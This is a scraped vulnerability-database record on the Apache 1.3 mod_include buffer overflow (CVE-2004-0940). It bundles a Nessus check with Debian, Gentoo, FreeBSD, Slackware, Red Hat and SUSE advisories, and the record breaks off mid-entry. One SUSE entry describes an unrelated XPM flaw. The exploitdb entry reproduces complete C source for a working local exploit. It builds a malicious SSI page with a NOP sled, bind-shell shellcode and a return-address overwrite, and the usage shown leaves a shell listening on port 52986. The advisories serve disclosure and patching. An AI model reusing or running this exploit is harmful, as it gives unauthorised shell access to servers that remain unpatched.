2004-12-02. 
This security\nupdate contains a number of fixes for the following programs :\n\n - Apache\n - Apache2\n - AppKit\n - Cyrus IMAP\n - HIToolbox\n - Kerberos\n - Postfix\n - PSNormalizer\n - QuickTime Streaming Server\n - Safari\n - Terminal\n\nThese programs contain multiple vulnerabilities that could allow a\nremote attacker to execute arbitrary code.\" );\n # http://web.archive.org/web/20080915104713/http://support.apple.com/kb/HT1646?\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?210abeb5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install Security Update 2004-12-02.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/12/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2003/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2004/12/02\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\nuname = get_kb_item(\"Host/uname\");\n# MacOS X 10.2.8, 10.3.6 only\nif ( egrep(pattern:\"Darwin.* (6\\.8\\.|7\\.6\\.)\", string:uname) )\n{\n if ( ! 
egrep(pattern:\"^SecUpd(Srvr)?2004-12-02\", string:packages) ) security_hole(0);\n\telse non_vuln = 1;\n}\nelse if ( egrep(pattern:\"Darwin.* (6\\.9|[0-9][0-9]\\.|7\\.([7-9]|[0-9][0-9]\\.|[8-9]\\.))\", string:uname) ) non_vuln = 1;\n\nif ( non_vuln )\n{\n set_kb_item(name:\"CVE-2004-1082\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0020\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0987\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0174\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0488\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0492\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0885\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0940\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1083\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1084\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0747\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0786\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0751\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0748\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1081\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0803\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0804\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0886\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1089\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1085\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0642\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0643\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0644\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0772\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1088\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1086\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1123\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1121\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1122\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1087\", value:TRUE);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0940"], "edition": 1, "description": "### 
Background\n\nThe Apache HTTP server is one of the most popular web servers on the internet. mod_include is an Apache module to handle Server Side Includes (SSI). \n\n### Description\n\nA possible buffer overflow exists in the get_tag() function of mod_include.c. \n\n### Impact\n\nIf Server Side Includes (SSI) are enabled, a local attacker may be able to run arbitrary code with the rights of an httpd child process by making use of a specially-crafted document with malformed SSI. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Apache users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/apache-1.3.32-r1\"", "modified": "2007-12-30T00:00:00", "published": "2004-11-02T00:00:00", "id": "GLSA-200411-03", "href": "https://security.gentoo.org/glsa/200411-03", "type": "gentoo", "title": "Apache 1.3: Buffer overflow vulnerability in mod_include", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2020-04-06T22:40:46", "bulletinFamily": "software", "cvelist": ["CVE-2004-0940"], "description": "", "edition": 1, "modified": "2018-07-03T23:32:00", "published": "2007-05-17T04:00:00", "id": "F5:K4207", "href": "https://support.f5.com/csp/article/K4207", "title": "Buffer overflow in mod_include - CAN-2004-0940", "type": "f5", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:18:40", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0940"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 594-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nNovember 17th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : apache\nVulnerability : buffer overflows\nProblem-Type : 
remote\nDebian-specific: no\nCVE ID : CAN-2004-0940\n\nTwo vulnerabilities have been identified in the Apache 1.3 webserver:\n\nCAN-2004-0940\n\n "Crazy Einstein" has discovered a vulnerability in the\n "mod_include" module, which can cause a buffer to be overflown and\n could lead to the execution of arbitrary code.\n\nNO VULN ID\n\n Larry Cashdollar has discovered a potential buffer overflow in the\n htpasswd utility, which could be exploited when user-supplied is\n passed to the program via a CGI (or PHP, or ePerl, ...) program.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 1.3.26-0woody6.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.3.33-2.\n\nWe recommend that you upgrade your apache packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6.dsc\n Size/MD5 checksum: 668 fa649037f25230b2ba98f8efd713ad88\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6.diff.gz\n Size/MD5 checksum: 299617 1765e5037ede60c140b9e23b063229ea\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26.orig.tar.gz\n Size/MD5 checksum: 2586182 5cd778bbe6906b5ef39dbb7ef801de61\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/a/apache/apache-doc_1.3.26-0woody6_all.deb\n Size/MD5 checksum: 1022694 f0446d04bf9c37df0b8a1f9be6f3aad6\n\n Alpha architecture:\n\n 
http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_alpha.deb\n Size/MD5 checksum: 395536 15fdfaaa7dbbc72258e08796648f4b8e\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_alpha.deb\n Size/MD5 checksum: 926002 ebbf79cf5c21f90b195bbd43948013e4\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_alpha.deb\n Size/MD5 checksum: 713916 fe8f05f9645bd3e8488390c6fd1b2b51\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_arm.deb\n Size/MD5 checksum: 361166 1c18634efb67b0cbb2de9a109dd02714\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_arm.deb\n Size/MD5 checksum: 838810 9dc7aa64b92560e2af3310495726c5a4\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_arm.deb\n Size/MD5 checksum: 544394 4f83a87a3efc91221f2de6e4b51495f1\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_i386.deb\n Size/MD5 checksum: 353260 5d8bba199ad51b93d69b3d93dd357bcc\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_i386.deb\n Size/MD5 checksum: 813432 0bb2c86f93d31ca3c677afc539f41835\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_i386.deb\n Size/MD5 checksum: 535772 fc62f039e6164064956de81416564da3\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_ia64.deb\n Size/MD5 checksum: 436892 d870f942fcf5f2176865ab0a0ff90ddc\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_ia64.deb\n Size/MD5 checksum: 1012454 f74ff7702abd1314867b5fd81874baad\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_ia64.deb\n Size/MD5 checksum: 949188 095050c609a54e53379c231629844a7c\n\n HP Precision architecture:\n\n 
http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_hppa.deb\n Size/MD5 checksum: 386218 86b1b77c83a3b7346b11e5f00db8865e\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_hppa.deb\n Size/MD5 checksum: 891646 65e8f5775d23b19084a7606ff808c336\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_hppa.deb\n Size/MD5 checksum: 587146 c1fc5a49e8b7f1fc6295e406bcf88025\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_m68k.deb\n Size/MD5 checksum: 347934 480bd7ce670d5f87780c11c443dac1f5\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_m68k.deb\n Size/MD5 checksum: 821150 a3182920fcb02b913a1bc74bcb1910ab\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_m68k.deb\n Size/MD5 checksum: 537284 3fa994f1cd5adb9176ff403cae9af05a\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_mips.deb\n Size/MD5 checksum: 376480 a7fb2f7a83b03dfc2a79358890665e22\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_mips.deb\n Size/MD5 checksum: 844090 5803969beff45f8a67cb9bc2cf088ba3\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_mips.deb\n Size/MD5 checksum: 576466 d4e48602a41d150f55a1faf7a8a79729\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_mipsel.deb\n Size/MD5 checksum: 376572 25ce9de3e4451afd7b272c7223e8c472\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_mipsel.deb\n Size/MD5 checksum: 842774 2bb614356424be2c183b005f6e526098\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_mipsel.deb\n Size/MD5 checksum: 565664 2b118fb23f4620a15a0f198cc9a4c134\n\n PowerPC architecture:\n\n 
http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_powerpc.deb\n Size/MD5 checksum: 367026 5c7bb480654c18173fc2832847b29a7d\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_powerpc.deb\n Size/MD5 checksum: 846210 2bb5492d16feb5776fe2bfd0a3ed9e3a\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_powerpc.deb\n Size/MD5 checksum: 559012 beb354c4458d0f80d9c1785ed0ce4bae\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_s390.deb\n Size/MD5 checksum: 363774 556139ecea6376447575f71260076024\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_s390.deb\n Size/MD5 checksum: 832552 40d5a926d7d6e912a2fbaded3e390766\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_s390.deb\n Size/MD5 checksum: 559466 f606926e180e055580734929ae327ac5\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_sparc.deb\n Size/MD5 checksum: 360932 5fbd6af082d95c20dc8b9d28762193ed\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_sparc.deb\n Size/MD5 checksum: 847426 3646a4ae614a8b7c0b10fec39a965a2b\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_sparc.deb\n Size/MD5 checksum: 544898 8a419bf9d03228d68793aea3af846dab\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2004-11-17T00:00:00", "published": "2004-11-17T00:00:00", "id": 
"DEBIAN:DSA-594-1:FDA26", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00203.html", "title": "[SECURITY] [DSA 594-1] New Apache packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T12:30:11", "description": "Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit. CVE-2004-0940. Local exploit for linux platform", "published": "2004-10-21T00:00:00", "type": "exploitdb", "title": "Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0940"], "modified": "2004-10-21T00:00:00", "id": "EDB-ID:587", "href": "https://www.exploit-db.com/exploits/587/", "sourceData": "/*********************************************************************************\r\n local exploit for mod_include of apache 1.3.x *\r\n written by xCrZx /18.10.2004/ *\r\n bug found by xCrZx /18.10.2004/ *\r\n *\r\n Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike) *\r\n *\r\n*********************************************************************************/\r\n\r\n/*********************************************************************************\r\nTechnical Details:\r\n\r\nthere is an overflow in get_tag function: \r\n \r\nstatic char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) \r\n{ \r\n... \r\nterm = c; \r\nwhile (1) { \r\nGET_CHAR(in, c, NULL, p); \r\n[1] if (t - tag == tagbuf_len) { \r\n*t = '\\0'; \r\nreturn NULL; \r\n} *\r\n// Want to accept \\\" as a valid character within a string. // \r\nif (c == '\\\\') { \r\n[2] *(t++) = c; // Add backslash // \r\nGET_CHAR(in, c, NULL, p); \r\nif (c == term) { // Only if // \r\n[3] *(--t) = c; // Replace backslash ONLY for terminator // \r\n} \r\n} \r\nelse if (c == term) { \r\nbreak; \r\n} \r\n[4] *(t++) = c; \r\n} \r\n*t = '\\0'; \r\n... 
\r\n\r\nas we can see there is a [1] check to determine the end of tag buffer \r\nbut this check can be skiped when [2] & [4] conditions will be occured\r\nat the same time without [3] condition.\r\n\r\nSo attacker can create malicious file to overflow static buffer, on \r\nwhich tag points out and execute arbitrary code with privilegies of \r\nhttpd child process. \r\n\r\nFix: \r\n[1*] if (t - tag >= tagbuf_len-1) { \r\n\r\nNotes: To activate mod_include you need write \"XBitHack on\" in httpd.conf \r\n\r\n*********************************************************************************/\r\n\r\n/*********************************************************************************\r\nExample of work: \r\n\r\n[root@blacksand htdocs]# make 85mod_include \r\ncc 85mod_include.c -o 85mod_include \r\n[root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html \r\n[root@blacksand htdocs]# chmod +x evil.html \r\n[root@blacksand htdocs]# netstat -na|grep 52986 \r\n[root@blacksand htdocs]# telnet localhost 8080 \r\nTrying 127.0.0.1... \r\nConnected to localhost. \r\nEscape character is '^]'. \r\nGET /evil.html HTTP/1.0 \r\n^] \r\ntelnet> q \r\nConnection closed. 
\r\n[root@blacksand htdocs]# netstat -na|grep 52986 \r\ntcp 0 0 0.0.0.0:52986 0.0.0.0:* LISTEN \r\n[root@blacksand htdocs]# \r\n*********************************************************************************/\r\n\r\n/*********************************************************************************\r\nNotes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always \r\n*********************************************************************************/\r\n\r\n/*********************************************************************************\r\nPersonal hello to my parents :) \r\n*********************************************************************************/\r\n\r\n/*********************************************************************************\r\nPublic shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz \r\n*********************************************************************************/\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n\r\n#define EVILBUF 8202\r\n#define HTMLTEXT 1000\r\n\r\n#define HTML_FORMAT \"<html>\\n<!--#echo done=\\\"%s\\\" -->\\nxCrZx 0wn U\\n</html>\"\r\n\r\n#define AUTHOR \"\\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\\n\"\r\n\r\nint main(int argc, char **argv) {\r\n\r\nchar html[EVILBUF+HTMLTEXT];\r\nchar evilbuf[EVILBUF+1];\r\n\r\n//can be changed\r\nchar shellcode[] =\r\n\r\n// bind shell on 52986 port \r\n\"\\x31\\xc0\"\r\n\"\\x31\\xdb\\x53\\x43\\x53\\x89\\xd8\\x40\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x43\"\r\n\"\\x66\\xc7\\x44\\x24\\x02\\xce\\xfa\\xd1\\x6c\\x24\\x04\\x6a\\x10\\x51\\x50\\x89\"\r\n\"\\xe1\\xb0\\x66\\xcd\\x80\\x43\\x43\\xb0\\x66\\xcd\\x80\\x43\\x89\\x61\\x08\\xb0\"\r\n\"\\x66\\xcd\\x80\\x93\\x31\\xc9\\xb1\\x03\\x49\\xb0\\x3f\\xcd\\x80\\x75\\xf9\\x68\"\r\n\"\\x2f\\x73\\x68\\x20\\x68\\x2f\\x62\\x69\\x6e\\x88\\x4c\\x24\\x07\\x89\\xe3\\x51\"\r\n\"\\x53\\x89\\xe1\\x31\\xd2\\xb0\\x0b\\xcd\\x80\";\r\n\r\n//execve /tmp/sh <- your own 
program\r\n/*\r\n\"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\"\r\n\"\\xb0\\x2e\\xcd\\x80\\xeb\\x15\\x5b\\x31\"\r\n\"\\xc0\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\"\r\n\"\\x43\\x0c\\x8d\\x4b\\x08\\x31\\xd2\\xb0\"\r\n\"\\x0b\\xcd\\x80\\xe8\\xe6\\xff\\xff\\xff\"\r\n\"/tmp/sh\";\r\n*/\r\n\r\n\r\nchar NOP[] = \"\\x90\\x40\"; // special nops ;)\r\nchar evilpad[] = \"\\\\CRZCRZCRZCRZC\"; // trick ;)\r\n\r\nint padding,xpad=0;\r\nint i,fd;\r\nlong ret=0xbfff8688;\r\n\r\nif(argc>1) ret=strtoul(argv[1],0,16);\r\nelse { fprintf(stderr,AUTHOR\"\\nUsage: %s <RET ADDR> > file.html\\n\\n\",argv[0]);exit(0); }\r\n\r\npadding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);\r\n\r\nwhile(1) {\r\nif(padding%2==0) { padding/=2; break;}\r\nelse {padding--;xpad++;}\r\n}\r\n\r\nmemset(html,0x0,sizeof html);\r\nmemset(evilbuf,0x0,sizeof evilbuf);\r\n\r\nfor(i=0;i<padding;i++)\r\nmemcpy(evilbuf+strlen(evilbuf),&NOP,2);\r\nfor(i=0;i<xpad;i++)\r\nmemcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);\r\n\r\nmemcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);\r\nmemcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);\r\n*(long*)&evilbuf[strlen(evilbuf)]=ret;\r\n\r\nsprintf(html,HTML_FORMAT,evilbuf);\r\n\r\nprintf(\"%s\",html);\r\n\r\nreturn 0;\r\n}\n\n// milw0rm.com [2004-10-21]\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/587/"}], "freebsd": [{"lastseen": "2019-05-29T18:35:09", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0940"], "description": "\nThere is a buffer overflow in a function used by mod_include\n\t that may enable a local user to gain privileges of a httpd\n\t child. 
Only users that are able to create SSI documents can\n\t take advantage of that vulnerability.\n", "edition": 4, "modified": "2004-10-22T00:00:00", "published": "2004-10-22T00:00:00", "id": "6E6A6B8A-2FDE-11D9-B3A2-0050FC56D258", "href": "https://vuxml.freebsd.org/freebsd/6e6a6b8a-2fde-11d9-b3a2-0050fc56d258.html", "title": "apache mod_include buffer overflow vulnerability", "type": "freebsd", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:35:56", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0492", "CVE-2004-0940"], "description": "New apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix a security issue. Apache has been upgraded to\nversion 1.3.33 which fixes a buffer overflow which may allow local\nusers to execute arbitrary code as the apache user.\n\nThe mod_ssl package has also been upgraded to version 2.8.22_1.3.33.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0940\n\n\nHere are the details from the Slackware 10.0 ChangeLog:\n\npatches/packages/apache-1.3.33-i486-1.tgz: Upgraded to apache-1.3.33.\n This fixes one new security issue (the first issue, CAN-2004-0492, was fixed\n in apache-1.3.33). The second bug fixed in 1.3.3 (CAN-2004-0940) allows a\n local user who can create SSI documents to become \"nobody\". 
The amount of\n mischief they could cause as nobody seems low at first glance, but it might\n allow them to use kill or killall as nobody to try to create a DoS.\n Mention PHP's mhash dependency in httpd.conf (thanks to Jakub Jankowski).\n (* Security fix *)\npatches/packages/mod_ssl-2.8.22_1.3.33-i486-1.tgz: Upgraded to\n mod_ssl-2.8.22_1.3.33.\n\nWhere to find the new packages:\n\nUpdated packages for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/apache-1.3.33-i386-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/mod_ssl-2.8.22_1.3.33-i386-1.tgz\n\nUpdated packages for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/apache-1.3.33-i386-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/mod_ssl-2.8.22_1.3.33-i386-1.tgz\n\nUpdated packages for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/apache-1.3.33-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\nUpdated packages for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/apache-1.3.33-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/apache-1.3.33-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 packages:\n53a9c132945eb4335aacfcb21d5996e0 apache-1.3.33-i386-1.tgz\nb0a95e205d3e88597aa9f1241ca7354f mod_ssl-2.8.22_1.3.33-i386-1.tgz\n\nSlackware 9.0 packages:\n429df7fa01205e5c12d3728f4987609f apache-1.3.33-i386-1.tgz\naf8345a9edf17dbd4e141b46d908990a mod_ssl-2.8.22_1.3.33-i386-1.tgz\n\nSlackware 9.1 packages:\nadb43447a8abcb7a6100343585d762db 
apache-1.3.33-i486-1.tgz\n00c1338c5c6db89960eb53ac4495ba41 mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\nSlackware 10.0 packages:\n22db37b8d3e7a32b75a274520e11e272 apache-1.3.33-i486-1.tgz\n1968e2361039e07f69658665dafcf56a mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\nSlackware -current packages:\nc450863cad0ed3771fea628d506b8caf apache-1.3.33-i486-1.tgz\n44fdebabf6130cd2fc4e048f5d619683 mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\n\nInstallation instructions:\n\nFirst, stop apache:\n\n > apachectl stop\n\nNext, upgrade the Apache package as root:\n\n > upgradepkg apache-1.3.33-i486-1.tgz\n\nFor mod_ssl users, IMPORTANT: Backup any keys/certificates you wish\nto save for mod_ssl (in /etc/apache/ssl.*), then upgrade mod_ssl:\n\n > upgradepkg mod_ssl-2.8.22_1.3.33-i486-1.tgz\n\nIf necessary, restore any mod_ssl config files.\n\nFinally, restart apache:\n\n > apachectl start\n\nOr, if you're running a secure server with mod_ssl:\n\n > apachectl startssl", "modified": "2004-11-01T08:00:31", "published": "2004-11-01T08:00:31", "id": "SSA-2004-305-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.533785", "type": "slackware", "title": "[slackware-security] apache+mod_ssl", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0987", "CVE-2004-0885", "CVE-2004-0940"], "description": "The Apache HTTP Server is a powerful, full-featured, efficient, and\nfreely-available Web server. The mod_ssl module provides strong\ncryptography for the Apache Web server via the Secure Sockets Layer (SSL)\nand Transport Layer Security (TLS) protocols.\n\nA buffer overflow was discovered in the mod_include module. This flaw\ncould allow a local user who is authorized to create server-side include\n(SSI) files to gain the privileges of a httpd child (user 'apache'). 
The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\nthe name CAN-2004-0940 to this issue.\n\nThe mod_digest module does not properly verify the nonce of a client\nresponse by using a AuthNonce secret. This could allow a malicious user who\nis able to sniff network traffic to conduct a replay attack against a\nwebsite using Digest protection. Note that mod_digest implements an older\nversion of the MD5 Digest Authentication specification, which is known not\nto work with modern browsers. This issue does not affect mod_auth_digest. \n(CAN-2003-0987).\n\nAn issue has been discovered in the mod_ssl module when configured to use\nthe \"SSLCipherSuite\" directive in a directory or location context. If a\nparticular location context has been configured to require a specific set\nof cipher suites, then a client is able to access that location using\nany cipher suite allowed by the virtual host configuration. (CAN-2004-0885). \n\nSeveral bugs in mod_ssl were also discovered, including:\n\n- memory leaks in SSL variable handling\n\n- possible crashes in the dbm and shmht session caches\n\nRed Hat Enterprise Linux 2.1 users of the Apache HTTP Server should upgrade\nto these erratum packages, which contains Apache version 1.3.27 with\nbackported patches correcting these issues.", "modified": "2018-03-14T19:25:44", "published": "2004-12-13T05:00:00", "id": "RHSA-2004:600", "href": "https://access.redhat.com/errata/RHSA-2004:600", "type": "redhat", "title": "(RHSA-2004:600) apache, mod_ssl security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T12:14:55", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0885", "CVE-2004-0940", "CVE-2004-0492"], "description": "The XPM library which is part of the XFree86/XOrg project is used by several GUI applications to process XPM image files. A source code review done by Thomas Biege of the SuSE Security-Team revealed several different kinds of bugs. 
The bug types are: - integer overflows - out-of-bounds memory access - shell command execution - path traversal - endless loops By providing a special image these bugs can be exploited by remote and/or local attackers to gain access to the system or to escalate their local privileges.\n#### Solution\nNo workaround exists to protect against these bugs.", "edition": 1, "modified": "2004-11-17T16:17:43", "published": "2004-11-17T16:17:43", "id": "SUSE-SA:2004:041", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-11/msg00008.html", "title": "remote system compromise in xshared, XFree86-libs, xorg-x11-libs", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:23:22", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0891", "CVE-2004-0885", "CVE-2004-0989", "CVE-2004-0940", "CVE-2004-1007", "CVE-2004-0930", "CVE-2004-0888", "CVE-2004-0889", "CVE-2004-0492", "CVE-2004-0882"], "description": "There is a problem in the Samba file sharing service daemon, which allows a 